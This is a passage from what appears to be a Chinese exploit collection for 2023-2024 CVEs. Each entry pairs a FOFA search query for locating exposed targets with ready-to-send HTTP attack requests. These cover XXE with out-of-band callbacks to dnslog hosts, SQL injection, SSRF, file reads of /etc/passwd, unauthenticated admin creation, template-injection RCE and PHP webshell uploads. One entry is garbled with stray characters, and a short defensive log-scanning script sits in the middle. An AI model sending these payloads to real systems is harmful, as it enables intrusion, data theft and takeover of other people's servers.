      <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>
      </ds:KeyInfo>
      <ds:Object></ds:Object>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==


The SAMLRequest value is the base64 encoding of the following XML document:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>


104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露5 f$ y/ ?% ~  Y5 [
CVE-2024-0569
" \, ]0 I. i" A! NFOFA:title="TOTOLINK"
3 G) Y& R# S2 Z- [POST /cgi-bin/cstecgi.cgi HTTP/1.1  [5 `" u. p1 c0 H" I8 C
Host:192.168.0.1
. N# W3 Y2 u5 [% \  PContent-Length:41) J( ^& c8 m6 ]7 U3 E
Accept:application/json,text/javascript,*/*;q=0.01
$ |! l- R" Q) ]X-Requested-with: XMLHttpRequest8 e0 z8 a) Y8 W, V: r
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
. A% Y( r+ g' S8 J0 K  r+ ^Content-Type: application/x-www-form-urlencoded:charset=UTF-80 E6 o& A+ z9 x3 e  @9 [
Origin: http://192.168.0.1- C. J  O6 }. Y( A
Referer: http://192.168.0.1/advance/index.html?time=1671152380564; }1 c. t7 N, B; b" G7 j7 g. k( U' }
Accept-Encoding:gzip,deflate" @' k1 z: K* J9 P2 ?1 N! O( n% X
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
1 z8 e$ O. k; W" H* A; a( IConnection:close
1 G" [  q+ |4 [9 I) o' t
& E( d- @; D* A0 A; I{, d! y" D$ J5 Z# h0 s
"topicurl":"getSysStatusCfg",. _  m" v$ g6 M+ q3 ~# z; i
"token":""
. d7 s( `. k: q0 P0 M- ?" I}# B% Y+ C( }, ?  |! O2 T, D
' S0 |! J$ X( P# [1 H) i
105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: (replace with your own token)
Connection: close


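A defender-side note on the three SpringBlade entries (105-107): the updatexml() probe is carried in the name of the query-string parameter, not in its value, so inspection rules that only look at parameter values never see it. The following is an added example (not part of the original post or of SpringBlade) that decodes a request target, checks both halves of every name=value pair for the MySQL error- and time-based markers used on this page, and runs that check over a few constructed access-log lines in the Apache/nginx combined format (assumed; adjust the regex for other log layouts). An HTTP 500 next to an updatexml hit is the usual sign that the injected expression reached the database.

```python
# Added example (not from the original post): flag SQL-injection probes that
# sit in the NAME of a query parameter, as in the SpringBlade requests above.
# Log lines below are constructed samples in combined-log format (assumed).
import re
from urllib.parse import parse_qsl, urlsplit

# MySQL error-based / time-based probe markers seen across this page.
# Kept to function-call forms to limit false positives on ordinary
# parameter names such as "select" or "union".
SQLI_MARKERS = re.compile(
    r"(updatexml\s*\(|extractvalue\s*\(|sleep\s*\(|benchmark\s*\(|concat\s*\(|0x7e)",
    re.IGNORECASE,
)

# Minimal combined-log parser: client ip, method, request target, status code.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def find_sqli(request_target: str):
    """Return [(position, text), ...] for every query parameter name or value
    carrying an injection marker. parse_qsl percent-decodes first, so
    %28SELECT%28SLEEP%285%29%29 is inspected as (SELECT(SLEEP(5))."""
    query = urlsplit(request_target).query
    hits = []
    # keep_blank_values: a probe with an empty value (updatexml(...)=) still counts
    for name, value in parse_qsl(query, keep_blank_values=True):
        if SQLI_MARKERS.search(name):
            hits.append(("name", name))
        if SQLI_MARKERS.search(value):
            hits.append(("value", value))
    return hits


def scan_access_log(lines):
    """Return one record per flagged request: source ip, method, target,
    HTTP status and the matched parameter positions."""
    flagged = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than guess
        ip, method, target, status = m.groups()
        hits = find_sqli(target)
        if hits:
            flagged.append({"ip": ip, "method": method, "target": target,
                            "status": int(status), "hits": hits})
    return flagged


# Constructed sample log; the probes mirror the SpringBlade requests above,
# plus one value-position probe for comparison.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Mar/2024:10:00:00 +0000] "GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1" 500 312',
    '10.0.0.6 - - [01/Mar/2024:10:00:01 +0000] "GET /api/blade-system/dict-biz/list?current=1&size=10 HTTP/1.1" 200 1024',
    '10.0.0.7 - - [01/Mar/2024:10:00:02 +0000] "GET /api/blade-system/tenant/list?size=10&updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1" 500 298',
    '10.0.0.8 - - [01/Mar/2024:10:00:03 +0000] "GET /api/blade-system/tenant/list?size=10&name=1%27+AND+%28SELECT%28SLEEP%285%29%29%29a HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for rec in scan_access_log(SAMPLE_LOG):
        print(rec["ip"], rec["status"], rec["hits"])
```

Run as-is it reports the three probing lines and stays silent on the ordinary paginated request; the second sample (a normal listing with current=1&size=10) is there to show that legitimate traffic to the same endpoint is not flagged.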
108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)


110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}


113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}


116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--


117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default account/password is admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456


120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--


File path: /upload/2.php

121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

Uploaded file path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
The sql parameter is the SQL statement base64-encoded: sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= decodes to select 1,database(),version(). A WAF rule that matches SQL keywords on the raw query string never sees it; decode the parameter before matching.
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
CVE-2023-22527
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

The command output comes back in the X-Cmd-Response response header. The \uXXXX escapes in label are decoded server-side, so the quotes and brackets that assemble the OGNL expression never appear literally in the request body.

124. Hunan Jianyan engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

Uploaded file: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin console directly; system commands can then be executed from there.

126. aiohttp path traversal
CVE-2024-23334
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The dot segments must reach the server unnormalized; browsers and most HTTP clients collapse them before sending, so use Burp Repeater, a raw socket, or curl --path-as-is.

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

The external entity is resolved when Params is parsed; a DNS or HTTP hit on the dnslog host confirms the XXE without the entity value being echoed back.

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018u17 and earlier, 2021u7 and earlier, 2023u1 and earlier
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read /etc/passwd, sending the uuid from step 1 in the uuid header
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

The request carries only the user_name/user_id cookies shown, and the part is declared as image/png while carrying PHP; both are things an upload handler should check.

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin console: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

The orderBy value is concatenated into the ORDER BY clause; a three-second delay when the database name is 11 characters long confirms the time-based injection.

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "<username>", "password": "<password>", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

Any unauthenticated path that 404s (here /pwned) is forwarded to the path in the jsp parameter; the trailing ;.jsp makes the auth filter treat the REST endpoint as a JSP resource.

CVE-2024-27199 (path traversal, same advisory), unauthenticated access to the diagnostics page:
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

Script: CVE-2024-27198-RCE.py

133. H5 cloud mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

The injection point is the IPAddr field inside the JSON-encoded messagecontent string; updatexml() returns the database version in the error text.

